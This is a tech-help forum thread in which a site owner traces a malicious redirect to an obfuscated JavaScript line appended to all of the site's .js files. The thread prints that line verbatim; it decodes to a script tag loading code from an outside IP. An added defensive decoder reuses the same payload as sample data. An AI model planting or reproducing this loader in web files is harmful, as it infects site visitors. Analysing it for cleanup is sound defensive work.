• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 794

Website hacked with redirect script to malicious server

http://71.18.231.91/

If you go there, you will see it attempts to redirect you to 94.247.2.195:80

That's where the hack host site tries to inject code into your computer, or whatever it is that it's trying to do.

Anyone got any clue how to tell what file, what piece of code, is trying to do the redirect when you go to http://71.18.231.91/?

Wish I knew!


0
Asked by: jason_jm
 
jason_jm (Author) Commented:
--><!--
document.write(unescape('%3CONsxecxerxeieQ7ptXP%20sreQ7c%3Dwb%2Fa2p%2FXP94PqY%2E247%2Ewb2%2EON19eQ75%2FjeQ7qwbuerPqYy%2Exej3zs%3E%3CeQ7%2Fsxecript%3E').replace(/wb|eQ7|a2p|ON|PqY|xe|XP|3z/g,""));
 -->


that code was added to all .js files

solved
0
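Added example, not part of the original thread: a static decoder for the injected line quoted in the comment above, which recovers what the `document.write(unescape(...).replace(...))` statement would emit without ever executing it. The names `findInjectedWrites`, `unescapeStatic` and `SAMPLE_JS` are assumptions, and the `toggleMenu` line is constructed filler; pass each `.js` file's contents to `findInjectedWrites` to locate and decode the appended statement.

```javascript
// Constructed sample: one site function plus the injected lines quoted in the thread.
const SAMPLE_JS = `function toggleMenu(id) { return id; }
--><!--
document.write(unescape('%3CONsxecxerxeieQ7ptXP%20sreQ7c%3Dwb%2Fa2p%2FXP94PqY%2E247%2Ewb2%2EON19eQ75%2FjeQ7qwbuerPqYy%2Exej3zs%3E%3CeQ7%2Fsxecript%3E').replace(/wb|eQ7|a2p|ON|PqY|xe|XP|3z/g,""));
 -->`;

// Shape matched: document.write(unescape('<payload>').replace(/<junk>/<flags>, '<replacement>'))
const INJECTION =
  /document\.write\(\s*unescape\(\s*(['"])([^'"]*)\1\s*\)\s*\.replace\(\s*\/((?:[^\/\\\n]|\\.)+)\/([a-z]*)\s*,\s*(['"])([^'"]*)\5\s*\)\s*\)/g;

// Same result as the legacy unescape(): %XX and %uXXXX become single code units.
function unescapeStatic(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Returns one finding per injected statement, decoded as text and never executed.
function findInjectedWrites(source) {
  const findings = [];
  for (const m of source.matchAll(INJECTION)) {
    let junk;
    try {
      junk = new RegExp(m[3], m[4]); // pattern data only, nothing is evaluated
    } catch (e) {
      continue; // not a valid regex literal, so not this injection shape
    }
    // Strip the junk tokens exactly as the injected statement would.
    const decoded = unescapeStatic(m[2]).replace(junk, m[6]);
    // Collect the src of every script tag the statement would have written.
    const sources = [...decoded.matchAll(/<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi)]
      .map((s) => s[1]);
    // 1-based line number of the statement inside the scanned file.
    const line = source.slice(0, m.index).split("\n").length;
    findings.push({ line, decoded, sources });
  }
  return findings;
}

console.log(findInjectedWrites(SAMPLE_JS));
```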
 
Sourabh-Excahnge Commented:
Redirection can be set in multiple ways:
1. Check c:\inetpub\wwwroot; under this folder, open each and every file and check if you find any redirection there.
2. Open IIS Manager, highlight the default website, and in the right pane try to browse the iisstart.htm page.
3. Under the properties of the default website, go to the Documents tab and check which document is at the top, and try to browse that file.
0
 
aamodt Commented:
If you search for 94.247.2.195:80 on Google, they say that it is a virus. A Trojan, to be more specific. Like the Zief virus, it injects it automatically when you as a user change the source code, or it can just inject by lying on the server undetected and parsing the redirect code unseen.

I suggest you search for fixes to the virus: Troj/JSRedir-0

and try to get rid of it. According to my resources, it is the trojan Troj/JSRedir-0 you have been infected by.
It's a JavaScript that redirects you to that server.
0
 
jason_jm (Author) Commented:
Yep, was trying to work out how the website was being redirected.

It's from that JavaScript code added to the end of all .js files.

Now I gotta figure out how the hacker got access to the .js files.

Probably through an infected PC from a web designer (stealing the FTP password in cleartext).
0
 
aamodt Commented:
Yeah, we had the same problem with one of our webservers as well. One of the developers had the virus and infected the site with the JavaScript.
0
